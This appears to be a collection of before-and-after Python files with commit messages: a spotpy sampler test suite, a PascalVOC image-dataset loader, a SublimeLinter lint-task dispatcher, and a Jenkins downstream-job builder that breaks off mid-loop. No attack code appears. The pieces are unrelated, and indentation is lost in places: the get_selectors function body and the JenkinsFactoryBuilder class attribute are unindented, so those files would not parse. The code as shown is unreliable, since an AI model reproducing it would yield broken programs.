        sampler = spotpy.algorithms.lhs(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_mle(self):
        sampler = spotpy.algorithms.mle(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_mcmc(self):
        sampler = spotpy.algorithms.mcmc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_demcz(self):
        sampler = spotpy.algorithms.demcz(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_dream(self):
        # Was passing the spot_setup *class* instead of the configured
        # instance created in __init__.
        sampler = spotpy.algorithms.dream(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_sceua(self):
        sampler = spotpy.algorithms.sceua(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_abc(self):
        sampler = spotpy.algorithms.abc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_fscabc(self):
        sampler = spotpy.algorithms.fscabc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_rope(self):
        sampler = spotpy.algorithms.rope(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_sa(self):
        sampler = spotpy.algorithms.sa(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_list(self):
        sampler = spotpy.algorithms.list(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_fast(self):
        sampler = spotpy.algorithms.fast(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), 2, self.tolerance)  # Si values should be returned

    @classmethod
    def tearDownClass(cls):
        # Remove the shared database file written by the samplers.
        import os  # os was never imported at module level
        try:
            os.remove("Rosen.csv")
        except FileNotFoundError:
            pass
if __name__ == '__main__':
    # exit=False lets the interpreter continue after the test run.
    unittest.main(exit=False)
|
from __future__ import division
from __future__ import print_function
import os
from xml.dom.minidom import parse
import numpy as np
from skimage.io import imread
from skimage.transform import resize
from .dataset import Datasets
from .download import maybe_download_and_extract
# Download location of the PascalVOC 2012 trainval archive.
URL = 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/'\
      'VOCtrainval_11-May-2012.tar'

# The 20 PascalVOC object classes; label vectors index into this list.
CLASSES = [
    'person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',
    'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',
    'diningtable', 'pottedplant', 'sofa', 'tvmonitor'
]

# Nominal input dimensions reported by the dataset properties below.
WIDTH = 224
HEIGHT = 224
NUM_CHANNELS = 3
class PascalVOC(Datasets):
    """PascalVOC 2012 classification dataset with train/val/test splits."""

    def __init__(self, data_dir, val_size=1500):
        maybe_download_and_extract(URL, data_dir)
        data_dir = os.path.join(data_dir, 'VOCdevkit', 'VOC2012')

        annotation_files = os.listdir(os.path.join(data_dir, 'Annotations'))
        basenames = sorted(f.split('.')[0] for f in annotation_files)

        # PascalVOC didn't release the full test annotations yet, use the
        # validation set instead :(
        super(PascalVOC, self).__init__(
            Dataset(basenames[val_size:], data_dir),
            Dataset(basenames[:val_size], data_dir),
            Dataset(basenames[:val_size], data_dir))

    @property
    def classes(self):
        """The 20 PascalVOC class names."""
        return CLASSES

    @property
    def width(self):
        """Nominal image width."""
        return WIDTH

    @property
    def height(self):
        """Nominal image height."""
        return HEIGHT

    @property
    def num_channels(self):
        """Number of color channels."""
        return NUM_CHANNELS
class Dataset(object):
    """Epoch-aware batch iterator over PascalVOC example names."""

    def __init__(self, names, data_dir):
        # names: example basenames (no extension); data_dir: VOC2012 root.
        self.epochs_completed = 0
        self._data_dir = data_dir
        self._names = names
        self._index_in_epoch = 0

    @property
    def num_examples(self):
        """Number of examples in this split."""
        return len(self._names)

    def _random_shuffle_examples(self):
        # Shuffle names in place via a random permutation of indices.
        perm = np.arange(self.num_examples)
        np.random.shuffle(perm)
        self._names = [self._names[i] for i in perm]

    def next_batch(self, batch_size, shuffle=True):
        """Return (images, labels) for the next batch, wrapping epochs."""
        start = self._index_in_epoch
        # Shuffle for the first epoch.
        if self.epochs_completed == 0 and start == 0 and shuffle:
            self._random_shuffle_examples()
        if start + batch_size > self.num_examples:
            # Finished epoch.
            self.epochs_completed += 1
            # Get the rest examples in this epoch.
            rest_num_examples = self.num_examples - start
            names_rest = self._names[start:self.num_examples]
            # Shuffle the examples.
            if shuffle:
                self._random_shuffle_examples()
            # Start next epoch.
            start = 0
            self._index_in_epoch = batch_size - rest_num_examples
            end = self._index_in_epoch
            names = names_rest + self._names[start:end]
        else:
            # Just slice the examples.
            self._index_in_epoch += batch_size
            end = self._index_in_epoch
            names = self._names[start:end]
        images = [self._read_image(name) for name in names]
        labels = np.stack([self._read_label(name) for name in names])
        return images, labels

    def _read_image(self, name):
        """Read a JPEG image and scale it to float32 in [0, 1]."""
        path = os.path.join(self._data_dir, 'JPEGImages',
                            '{}.jpg'.format(name))
        image = imread(path)
        # astype already yields float32; the second cast was redundant.
        return (1 / 255) * image.astype(np.float32)

    def _read_label(self, name):
        """Return a one-hot label for the largest annotated object.

        Returns an all-zero vector when the annotation contains no
        objects (previously this crashed on CLASSES.index('')).
        """
        path = os.path.join(self._data_dir, 'Annotations',
                            '{}.xml'.format(name))
        annotation = parse(path)
        label = np.zeros((len(CLASSES)), np.uint8)
        max_area = 0
        max_name = ''
        for obj in annotation.getElementsByTagName('object'):
            # Use a distinct variable; the loop previously shadowed the
            # *name* parameter.
            obj_name = obj.getElementsByTagName('name')[0].firstChild.nodeValue
            bbox = obj.getElementsByTagName('bndbox')[0]
            xmin = bbox.getElementsByTagName('xmin')[0].firstChild.nodeValue
            xmax = bbox.getElementsByTagName('xmax')[0].firstChild.nodeValue
            ymin = bbox.getElementsByTagName('ymin')[0].firstChild.nodeValue
            ymax = bbox.getElementsByTagName('ymax')[0].firstChild.nodeValue
            area = (float(xmax) - float(xmin)) * (float(ymax) - float(ymin))
            if area > max_area:
                max_area = area
                max_name = obj_name
        if max_name:
            label[CLASSES.index(max_name)] = 1
        return label
typos, linting
from __future__ import division
from __future__ import print_function
import os
from xml.dom.minidom import parse
import numpy as np
from skimage.io import imread
from .dataset import Datasets
from .download import maybe_download_and_extract
# Download location of the PascalVOC 2012 trainval archive.
URL = 'http://host.robots.ox.ac.uk/pascal/VOC/voc2012/'\
      'VOCtrainval_11-May-2012.tar'

# The 20 PascalVOC object classes; label vectors index into this list.
CLASSES = [
    'person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',
    'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',
    'diningtable', 'pottedplant', 'sofa', 'tvmonitor'
]

# Nominal input dimensions reported by the dataset properties below.
WIDTH = 224
HEIGHT = 224
NUM_CHANNELS = 3
class PascalVOC(Datasets):
    """PascalVOC 2012 classification dataset with train/val/test splits."""

    def __init__(self, data_dir, val_size=1500):
        maybe_download_and_extract(URL, data_dir)
        data_dir = os.path.join(data_dir, 'VOCdevkit', 'VOC2012')

        annotation_files = os.listdir(os.path.join(data_dir, 'Annotations'))
        basenames = sorted(f.split('.')[0] for f in annotation_files)

        # PascalVOC didn't release the full test annotations yet, use the
        # validation set instead :(
        super(PascalVOC, self).__init__(
            Dataset(basenames[val_size:], data_dir),
            Dataset(basenames[:val_size], data_dir),
            Dataset(basenames[:val_size], data_dir))

    @property
    def classes(self):
        """The 20 PascalVOC class names."""
        return CLASSES

    @property
    def width(self):
        """Nominal image width."""
        return WIDTH

    @property
    def height(self):
        """Nominal image height."""
        return HEIGHT

    @property
    def num_channels(self):
        """Number of color channels."""
        return NUM_CHANNELS
class Dataset(object):
    """Epoch-aware batch iterator over PascalVOC example names."""

    def __init__(self, names, data_dir):
        # names: example basenames (no extension); data_dir: VOC2012 root.
        self.epochs_completed = 0
        self._data_dir = data_dir
        self._names = names
        self._index_in_epoch = 0

    @property
    def num_examples(self):
        """Number of examples in this split."""
        return len(self._names)

    def _random_shuffle_examples(self):
        # Shuffle names in place via a random permutation of indices.
        perm = np.arange(self.num_examples)
        np.random.shuffle(perm)
        self._names = [self._names[i] for i in perm]

    def next_batch(self, batch_size, shuffle=True):
        """Return (images, labels) for the next batch, wrapping epochs."""
        start = self._index_in_epoch
        # Shuffle for the first epoch.
        if self.epochs_completed == 0 and start == 0 and shuffle:
            self._random_shuffle_examples()
        if start + batch_size > self.num_examples:
            # Finished epoch.
            self.epochs_completed += 1
            # Get the rest examples in this epoch.
            rest_num_examples = self.num_examples - start
            names_rest = self._names[start:self.num_examples]
            # Shuffle the examples.
            if shuffle:
                self._random_shuffle_examples()
            # Start next epoch.
            start = 0
            self._index_in_epoch = batch_size - rest_num_examples
            end = self._index_in_epoch
            names = names_rest + self._names[start:end]
        else:
            # Just slice the examples.
            self._index_in_epoch += batch_size
            end = self._index_in_epoch
            names = self._names[start:end]
        images = [self._read_image(name) for name in names]
        labels = np.stack([self._read_label(name) for name in names])
        return images, labels

    def _read_image(self, name):
        """Read a JPEG image and scale it to float32 in [0, 1]."""
        path = os.path.join(self._data_dir, 'JPEGImages',
                            '{}.jpg'.format(name))
        image = imread(path)
        # astype already yields float32; the second cast was redundant.
        return (1 / 255) * image.astype(np.float32)

    def _read_label(self, name):
        """Return a one-hot label for the largest annotated object.

        Returns an all-zero vector when the annotation contains no
        objects (previously this crashed on CLASSES.index('')).
        """
        path = os.path.join(self._data_dir, 'Annotations',
                            '{}.xml'.format(name))
        annotation = parse(path)
        label = np.zeros((len(CLASSES)), np.uint8)
        max_area = 0
        max_name = ''
        for obj in annotation.getElementsByTagName('object'):
            # Use a distinct variable; the loop previously shadowed the
            # *name* parameter.
            obj_name = obj.getElementsByTagName('name')[0].firstChild.nodeValue
            bbox = obj.getElementsByTagName('bndbox')[0]
            xmin = bbox.getElementsByTagName('xmin')[0].firstChild.nodeValue
            xmax = bbox.getElementsByTagName('xmax')[0].firstChild.nodeValue
            ymin = bbox.getElementsByTagName('ymin')[0].firstChild.nodeValue
            ymax = bbox.getElementsByTagName('ymax')[0].firstChild.nodeValue
            area = (float(xmax) - float(xmin)) * (float(ymax) - float(ymin))
            if area > max_area:
                max_area = area
                max_name = obj_name
        if max_name:
            label[CLASSES.index(max_name)] = 1
        return label
|
import sublime
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from fnmatch import fnmatch
from itertools import chain
from functools import partial
import os
import traceback
from . import persist, util
# Syntax selector value that matches any syntax.
WILDCARD_SYNTAX = '*'
def lint_view(view, hit_time, next):
    """Top-level lint dispatcher for `view`; called asynchronously.

    Disabled linters are reported immediately with an empty error list so
    that consumers (status bar etc.) still get an update for every linter.
    The remaining linters are expanded into lint tasks and run
    concurrently.
    """
    enabled, disabled = get_linters(view)
    # Contract: we MUST fire `next` for every linter so views update.
    for disabled_linter in disabled:
        next(disabled_linter, [])
    run_concurrently(
        partial(run_tasks, tasks, next=partial(next, linter))
        for linter, tasks in get_lint_tasks(enabled, view, hit_time)
    )
def run_tasks(tasks, next):
    """Run `tasks` concurrently and hand the flattened errors to `next`.

    The callback is marshalled onto Sublime's shared worker thread, which
    executes scheduled tasks ordered and sequentially, so consumers/views
    need not be thread aware.
    """
    all_errors = list(chain.from_iterable(run_concurrently(tasks)))
    sublime.set_timeout_async(lambda: next(all_errors))
def get_lint_tasks(linters, view, hit_time):
    """Yield (linter, tasks) pairs, one lazy task per lint region."""
    for linter, settings, regions in get_lint_regions(linters, view):
        # Bind linter/settings via defaults so the lazily-consumed
        # generator below sees this iteration's values.
        def task_for(region, linter=linter, settings=settings):
            # Snapshot the region's code and (row, col) offset now.
            code = view.substr(region)
            offset = view.rowcol(region.begin())
            return partial(
                execute_lint_task, linter, code, offset, hit_time, settings
            )
        yield linter, (task_for(region) for region in regions)
def execute_lint_task(linter, code, offset, hit_time, settings):
    """Run one linter over `code`; return its errors shifted by `offset`."""
    lint_result = linter.lint(code, hit_time, settings)
    errors = lint_result if lint_result else []
    translate_lineno_and_column(errors, offset)
    return errors
def translate_lineno_and_column(errors, offset):
    """Shift error positions in place by `offset` = (line, col).

    Column offsets only apply to errors on the first line of the region;
    later lines already start at column 0 of the buffer.
    """
    if offset == (0, 0):
        return
    line_offset, col_offset = offset
    for error in errors:
        original_line = error['line']
        error['line'] = original_line + line_offset
        if original_line == 0:
            error['start'] += col_offset
            error['end'] += col_offset
def get_lint_regions(linters, view):
    """Yield (linter, settings, regions) for each enabled linter.

    A linter whose selectors mention neither the view's syntax nor the
    wildcard lints the whole buffer; otherwise only the matching scoped
    regions are linted as embedded code.
    """
    syntax = util.get_syntax(view)
    for linter, settings in linters:
        selectors = linter.selectors
        if syntax in selectors or WILDCARD_SYNTAX in selectors:
            regions = [
                region
                for selector in get_selectors(linter, syntax)
                for region in view.find_by_selector(selector)
            ]
        else:
            regions = [sublime.Region(0, view.size())]
        yield linter, settings, regions
def get_selectors(linter, wanted_syntax):
for syntax in [wanted_syntax, WILDCARD_SYNTAX]:
try:
yield linter.selectors[syntax]
except KeyError:
pass
def get_linters(view):
    """Split the view's linters into (enabled, disabled) for this run.

    A linter is disabled when its lint mode forbids dirty buffers, its
    settings say 'disable', or the file matches an 'excludes' pattern.
    Enabled entries are (linter, view_settings) pairs.
    """
    filename = view.file_name()
    vid = view.id()
    enabled, disabled = [], []
    for linter in persist.view_linters.get(vid, []):
        # First check to see if the linter can run in the current lint mode.
        if linter.tempfile_suffix == '-' and view.is_dirty():
            disabled.append(linter)
            continue
        view_settings = linter._get_view_settings()
        if view_settings.get('disable'):
            disabled.append(linter)
            continue
        if filename:
            # Resolve symlinks so exclude patterns match the real path.
            filename = os.path.realpath(filename)
            excludes = util.convert_type(view_settings.get('excludes', []), [])
            if excludes:
                matched = False
                for pattern in excludes:
                    if fnmatch(filename, pattern):
                        persist.debug(
                            '{} skipped \'{}\', excluded by \'{}\''
                            .format(linter.name, filename, pattern)
                        )
                        matched = True
                        break
                if matched:
                    disabled.append(linter)
                    continue
        enabled.append((linter, view_settings))
    return enabled, disabled
def run_concurrently(tasks, max_workers=5):
    """Execute `tasks` on a thread pool; return their results as a list."""
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(task) for task in tasks]
        # Consume the generator while the executor is still alive.
        return list(await_futures(futures))
def await_futures(fs, ordered=False):
    """Yield results of the futures `fs` as they finish.

    With ordered=True, block until all are done first.  Exceptions raised
    by individual futures are printed and swallowed.
    """
    iterator = wait(fs)[0] if ordered else as_completed(fs)
    for future in iterator:
        try:
            yield future.result()
        except Exception:
            traceback.print_exc()
Inline make_task
import sublime
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from fnmatch import fnmatch
from itertools import chain
from functools import partial
import os
import traceback
from . import persist, util
WILDCARD_SYNTAX = '*'
def lint_view(view, hit_time, next):
    """Top-level lint dispatcher for `view`; called asynchronously.

    Disabled linters are reported immediately with an empty error list so
    that consumers (status bar etc.) still get an update for every linter.
    The remaining linters are expanded into lint tasks and run
    concurrently.
    """
    enabled, disabled = get_linters(view)
    # Contract: we MUST fire `next` for every linter so views update.
    for disabled_linter in disabled:
        next(disabled_linter, [])
    run_concurrently(
        partial(run_tasks, tasks, next=partial(next, linter))
        for linter, tasks in get_lint_tasks(enabled, view, hit_time)
    )
def run_tasks(tasks, next):
    """Run `tasks` concurrently and hand the flattened errors to `next`.

    The callback is marshalled onto Sublime's shared worker thread, which
    executes scheduled tasks ordered and sequentially, so consumers/views
    need not be thread aware.
    """
    all_errors = list(chain.from_iterable(run_concurrently(tasks)))
    sublime.set_timeout_async(lambda: next(all_errors))
def get_lint_tasks(linters, view, hit_time):
    """Yield (linter, tasks) pairs, one ready-to-run task per region."""
    for linter, settings, regions in get_lint_regions(linters, view):
        yield linter, [
            partial(
                execute_lint_task,
                linter,
                view.substr(region),
                view.rowcol(region.begin()),
                hit_time,
                settings,
            )
            for region in regions
        ]
def execute_lint_task(linter, code, offset, hit_time, settings):
    """Run one linter over `code`; return its errors shifted by `offset`."""
    lint_result = linter.lint(code, hit_time, settings)
    errors = lint_result if lint_result else []
    translate_lineno_and_column(errors, offset)
    return errors
def translate_lineno_and_column(errors, offset):
    """Shift error positions in place by `offset` = (line, col).

    Column offsets only apply to errors on the first line of the region;
    later lines already start at column 0 of the buffer.
    """
    if offset == (0, 0):
        return
    line_offset, col_offset = offset
    for error in errors:
        original_line = error['line']
        error['line'] = original_line + line_offset
        if original_line == 0:
            error['start'] += col_offset
            error['end'] += col_offset
def get_lint_regions(linters, view):
    """Yield (linter, settings, regions) for each enabled linter.

    A linter whose selectors mention neither the view's syntax nor the
    wildcard lints the whole buffer; otherwise only the matching scoped
    regions are linted as embedded code.
    """
    syntax = util.get_syntax(view)
    for linter, settings in linters:
        selectors = linter.selectors
        if syntax in selectors or WILDCARD_SYNTAX in selectors:
            regions = [
                region
                for selector in get_selectors(linter, syntax)
                for region in view.find_by_selector(selector)
            ]
        else:
            regions = [sublime.Region(0, view.size())]
        yield linter, settings, regions
def get_selectors(linter, wanted_syntax):
for syntax in [wanted_syntax, WILDCARD_SYNTAX]:
try:
yield linter.selectors[syntax]
except KeyError:
pass
def get_linters(view):
    """Split the view's linters into (enabled, disabled) for this run.

    A linter is disabled when its lint mode forbids dirty buffers, its
    settings say 'disable', or the file matches an 'excludes' pattern.
    Enabled entries are (linter, view_settings) pairs.
    """
    filename = view.file_name()
    vid = view.id()
    enabled, disabled = [], []
    for linter in persist.view_linters.get(vid, []):
        # First check to see if the linter can run in the current lint mode.
        if linter.tempfile_suffix == '-' and view.is_dirty():
            disabled.append(linter)
            continue
        view_settings = linter._get_view_settings()
        if view_settings.get('disable'):
            disabled.append(linter)
            continue
        if filename:
            # Resolve symlinks so exclude patterns match the real path.
            filename = os.path.realpath(filename)
            excludes = util.convert_type(view_settings.get('excludes', []), [])
            if excludes:
                matched = False
                for pattern in excludes:
                    if fnmatch(filename, pattern):
                        persist.debug(
                            '{} skipped \'{}\', excluded by \'{}\''
                            .format(linter.name, filename, pattern)
                        )
                        matched = True
                        break
                if matched:
                    disabled.append(linter)
                    continue
        enabled.append((linter, view_settings))
    return enabled, disabled
def run_concurrently(tasks, max_workers=5):
    """Execute `tasks` on a thread pool; return their results as a list."""
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(task) for task in tasks]
        # Consume the generator while the executor is still alive.
        return list(await_futures(futures))
def await_futures(fs, ordered=False):
    """Yield results of the futures `fs` as they finish.

    With ordered=True, block until all are done first.  Exceptions raised
    by individual futures are printed and swallowed.
    """
    iterator = wait(fs)[0] if ordered else as_completed(fs)
    for future in iterator:
        try:
            yield future.result()
        except Exception:
            traceback.print_exc()
|
from __future__ import absolute_import, division
import re
import time
from datetime import datetime
from flask import current_app
from changes.config import db
from changes.constants import Status
from changes.db.utils import get_or_create, create_or_update
from changes.models import TestResultManager, Node, JobPhase, JobStep
from changes.utils.agg import safe_agg
from .builder import JenkinsBuilder, NotFound, RESULT_MAP
BASE_XPATH = '/freeStyleProject/build[action/cause/upstreamProject="{upstream_job}" and action/cause/upstreamBuild="{build_no}"]/number'
DOWNSTREAM_XML_RE = re.compile(r'<number>(\d+)</number>')
class JenkinsFactoryBuilder(JenkinsBuilder):
provider = 'jenkins'
    def __init__(self, *args, **kwargs):
        # `downstream_job_names` is specific to the factory builder; pop it
        # before delegating the rest to JenkinsBuilder.
        self.downstream_job_names = kwargs.pop('downstream_job_names', ())
        super(JenkinsFactoryBuilder, self).__init__(*args, **kwargs)
    def _get_downstream_jobs(self, job, downstream_job_name):
        """Return build numbers of `downstream_job_name` triggered by `job`.

        Queries the Jenkins XML API with an XPath matching builds whose
        upstream cause is this job's (job_name, build_no).
        """
        xpath = BASE_XPATH.format(
            upstream_job=job.data['job_name'],
            build_no=job.data['build_no']
        )
        response = self._get_raw_response('/job/{job_name}/api/xml/'.format(
            job_name=downstream_job_name,
        ), params={
            'depth': 1,
            'xpath': xpath,
            'wrapper': 'a',
        })
        if not response:
            return []
        # NOTE(review): on Python 3 this returns a lazy map object; the
        # only caller just iterates it, so that is fine.
        return map(int, DOWNSTREAM_XML_RE.findall(response))
    def _sync_downstream_job(self, phase, job_name, build_no):
        """Create/update the JobStep mirroring Jenkins build `build_no`.

        Fetches build details, resolves the node it ran on and derives
        status/result/timestamps.  Returns the JobStep (added to the
        session, not committed).
        """
        item = self._get_response('/job/{}/{}'.format(
            job_name, build_no))
        node, _ = get_or_create(Node, where={
            'label': item['builtOn'],
        })
        values = {
            # Jenkins timestamps are milliseconds since the epoch.
            'date_started': datetime.utcfromtimestamp(
                item['timestamp'] / 1000),
        }
        if item['building']:
            values['status'] = Status.in_progress
        else:
            values['status'] = Status.finished
            values['result'] = RESULT_MAP[item['result']]
            # values['duration'] = item['duration'] or None
            values['date_finished'] = datetime.utcfromtimestamp(
                (item['timestamp'] + item['duration']) / 1000)
        jobstep, created = create_or_update(JobStep, where={
            'phase': phase,
            'label': item['fullDisplayName'],
            'job_id': phase.job_id,
            'project_id': phase.project_id,
            'node_id': node.id,
            'data': {
                'job_name': job_name,
                'queued': False,
                'item_id': None,
                'build_no': build_no,
            },
        }, values=values)
        # Record the Jenkins backend reference once, on first sync.
        if 'backend' not in jobstep.data:
            jobstep.data.update({
                'backend': {
                    'uri': item['url'],
                    'label': item['fullDisplayName'],
                }
            })
        db.session.add(jobstep)
        return jobstep
    def _sync_test_results(self, job):
        """Aggregate test results for `job` and its factory downstream jobs.

        Collects this job's own test report, then for each configured
        downstream job creates a JobPhase, syncs each downstream build as
        a JobStep (test report + console log), and finally updates the
        phase's date range and persists all collected test results.
        """
        # sync any upstream results we may have collected
        try:
            test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
                job_name=job.data['job_name'],
                build_no=job.data['build_no'],
            ))
        except NotFound:
            test_list = []
        else:
            test_list = self._process_test_report(job, test_report)
        # for any downstream jobs, pull their results using xpath magic
        for downstream_job_name in self.downstream_job_names:
            # XXX(dcramer): this is kind of gross, as we create the phase first
            # so we have an ID to reference, and then we update it with the
            # collective stats
            jobphase, created = get_or_create(JobPhase, where={
                'job': job,
                'label': downstream_job_name,
            }, defaults={
                'status': job.status,
                'result': job.result,
                'project_id': job.project_id,
            })
            db.session.commit()
            jobsteps = []
            for build_no in self._get_downstream_jobs(job, downstream_job_name):
                # XXX(dcramer): ideally we would grab this with the first query
                # but because we dont want to rely on an XML parser, we're doing
                # a second http request for build details
                downstream_jobstep = self._sync_downstream_job(
                    jobphase, downstream_job_name, build_no)
                jobsteps.append(downstream_jobstep)
                try:
                    test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
                        job_name=downstream_job_name,
                        build_no=build_no,
                    ))
                except NotFound:
                    pass
                else:
                    test_list.extend(self._process_test_report(job, test_report))
                db.session.commit()
                # Poll the console log until fully synced, 15s budget.
                try:
                    start = time.time()
                    result = True
                    while result:
                        if time.time() - start > 15:
                            raise Exception('Took too long to sync log')
                        result = self._sync_log(
                            jobstep=downstream_jobstep,
                            name=downstream_jobstep.label,
                            job_name=downstream_job_name,
                            build_no=build_no,
                        )
                except Exception:
                    db.session.rollback()
                    current_app.logger.exception(
                        'Unable to sync console log for job step %r',
                        downstream_jobstep.id.hex)
                db.session.commit()
            if jobsteps:
                # update phase statistics
                jobphase.date_started = safe_agg(
                    min, (s.date_started for s in jobsteps), default=job.date_started)
                jobphase.date_finished = safe_agg(
                    max, (s.date_finished for s in jobsteps), default=job.date_finished)
                # jobphase.duration = (jobphase.date_finished - jobphase.date_started).total_seconds()
            else:
                jobphase.date_started = job.date_started
                jobphase.date_finished = job.date_finished
            db.session.add(jobphase)
            db.session.commit()
        manager = TestResultManager(job)
        with db.session.begin_nested():
            manager.save(test_list)
Collect artifacts from downstream jobs
from __future__ import absolute_import, division
import re
import time
from datetime import datetime
from flask import current_app
from changes.config import db
from changes.constants import Status
from changes.db.utils import get_or_create, create_or_update
from changes.models import TestResultManager, Node, JobPhase, JobStep
from changes.utils.agg import safe_agg
from .builder import JenkinsBuilder, NotFound, RESULT_MAP
BASE_XPATH = '/freeStyleProject/build[action/cause/upstreamProject="{upstream_job}" and action/cause/upstreamBuild="{build_no}"]/number'
DOWNSTREAM_XML_RE = re.compile(r'<number>(\d+)</number>')
class JenkinsFactoryBuilder(JenkinsBuilder):
provider = 'jenkins'
    def __init__(self, *args, **kwargs):
        # `downstream_job_names` is specific to the factory builder; pop it
        # before delegating the rest to JenkinsBuilder.
        self.downstream_job_names = kwargs.pop('downstream_job_names', ())
        super(JenkinsFactoryBuilder, self).__init__(*args, **kwargs)
    def _get_downstream_jobs(self, job, downstream_job_name):
        """Return build numbers of `downstream_job_name` triggered by `job`.

        Queries the Jenkins XML API with an XPath matching builds whose
        upstream cause is this job's (job_name, build_no).
        """
        xpath = BASE_XPATH.format(
            upstream_job=job.data['job_name'],
            build_no=job.data['build_no']
        )
        response = self._get_raw_response('/job/{job_name}/api/xml/'.format(
            job_name=downstream_job_name,
        ), params={
            'depth': 1,
            'xpath': xpath,
            'wrapper': 'a',
        })
        if not response:
            return []
        # NOTE(review): on Python 3 this returns a lazy map object; the
        # only caller just iterates it, so that is fine.
        return map(int, DOWNSTREAM_XML_RE.findall(response))
    def _sync_downstream_job(self, phase, job_name, build_no):
        """Create/update the JobStep mirroring Jenkins build `build_no`.

        Fetches build details, resolves the node it ran on, derives
        status/result/timestamps, and syncs any build artifacts.
        Returns the JobStep (added to the session, not committed).
        """
        item = self._get_response('/job/{}/{}'.format(
            job_name, build_no))
        node, _ = get_or_create(Node, where={
            'label': item['builtOn'],
        })
        values = {
            # Jenkins timestamps are milliseconds since the epoch.
            'date_started': datetime.utcfromtimestamp(
                item['timestamp'] / 1000),
        }
        if item['building']:
            values['status'] = Status.in_progress
        else:
            values['status'] = Status.finished
            values['result'] = RESULT_MAP[item['result']]
            # values['duration'] = item['duration'] or None
            values['date_finished'] = datetime.utcfromtimestamp(
                (item['timestamp'] + item['duration']) / 1000)
        jobstep, created = create_or_update(JobStep, where={
            'phase': phase,
            'label': item['fullDisplayName'],
            'job_id': phase.job_id,
            'project_id': phase.project_id,
            'node_id': node.id,
            'data': {
                'job_name': job_name,
                'queued': False,
                'item_id': None,
                'build_no': build_no,
            },
        }, values=values)
        # Record the Jenkins backend reference once, on first sync.
        if 'backend' not in jobstep.data:
            jobstep.data.update({
                'backend': {
                    'uri': item['url'],
                    'label': item['fullDisplayName'],
                }
            })
        db.session.add(jobstep)
        # Collect any artifacts the downstream build produced.
        for artifact in item.get('artifacts', ()):
            self.sync_artifact(job=phase.job, artifact=artifact)
        return jobstep
    def _sync_test_results(self, job):
        """Aggregate test results for `job` and its factory downstream jobs.

        Collects this job's own test report, then for each configured
        downstream job creates a JobPhase, syncs each downstream build as
        a JobStep (test report + console log), and finally updates the
        phase's date range and persists all collected test results.
        """
        # sync any upstream results we may have collected
        try:
            test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
                job_name=job.data['job_name'],
                build_no=job.data['build_no'],
            ))
        except NotFound:
            test_list = []
        else:
            test_list = self._process_test_report(job, test_report)
        # for any downstream jobs, pull their results using xpath magic
        for downstream_job_name in self.downstream_job_names:
            # XXX(dcramer): this is kind of gross, as we create the phase first
            # so we have an ID to reference, and then we update it with the
            # collective stats
            jobphase, created = get_or_create(JobPhase, where={
                'job': job,
                'label': downstream_job_name,
            }, defaults={
                'status': job.status,
                'result': job.result,
                'project_id': job.project_id,
            })
            db.session.commit()
            jobsteps = []
            for build_no in self._get_downstream_jobs(job, downstream_job_name):
                # XXX(dcramer): ideally we would grab this with the first query
                # but because we dont want to rely on an XML parser, we're doing
                # a second http request for build details
                downstream_jobstep = self._sync_downstream_job(
                    jobphase, downstream_job_name, build_no)
                jobsteps.append(downstream_jobstep)
                try:
                    test_report = self._get_response('/job/{job_name}/{build_no}/testReport/'.format(
                        job_name=downstream_job_name,
                        build_no=build_no,
                    ))
                except NotFound:
                    pass
                else:
                    test_list.extend(self._process_test_report(job, test_report))
                db.session.commit()
                # Poll the console log until fully synced, 15s budget.
                try:
                    start = time.time()
                    result = True
                    while result:
                        if time.time() - start > 15:
                            raise Exception('Took too long to sync log')
